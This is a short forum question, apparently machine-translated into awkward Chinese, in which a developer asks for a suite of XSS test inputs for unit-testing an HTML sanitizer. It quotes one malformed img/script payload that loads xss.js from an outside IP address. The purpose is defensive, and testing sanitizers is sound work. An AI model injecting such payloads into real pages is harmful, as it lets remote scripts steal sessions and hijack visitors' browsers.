我期待寫HTML消毒殺菌劑,顯然測試/證明它正常工作,我需要一套XSS例子來推銷反對它,看它如何執行。這裏有一個nice example from Coding HorrorXSS酷刑測試 - 它存在嗎?
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"
我知道有一個Mime Torture Test包括與用於檢驗的Mime解碼器附件的幾個嵌套郵件(如果他們能正確地對其進行解碼,然後他們已經被證明的工作)。基本上,我尋找一個XSS的equivilent,即我可以告訴我的殺菌扔狡猾的HTML一系列例子只是爲了確保它的工作原理確定。
如果有人還對如何編寫殺菌任何好的資源(即哪些常見漏洞人們嘗試用等),他們會感激地接受了。
在此先感謝:-)
編輯:對不起,如果這是以前沒有明確,但我一組的折磨測試之後,所以我可以編寫單元測試殺菌器,在瀏覽器中沒有測試它等等。理論來源數據可能來自任何地方 - 不僅僅是瀏覽器。
具體爲「XSS備忘單的XML格式」,我錯過了第一次看到該頁面。 – dbr 2008-11-02 13:29:07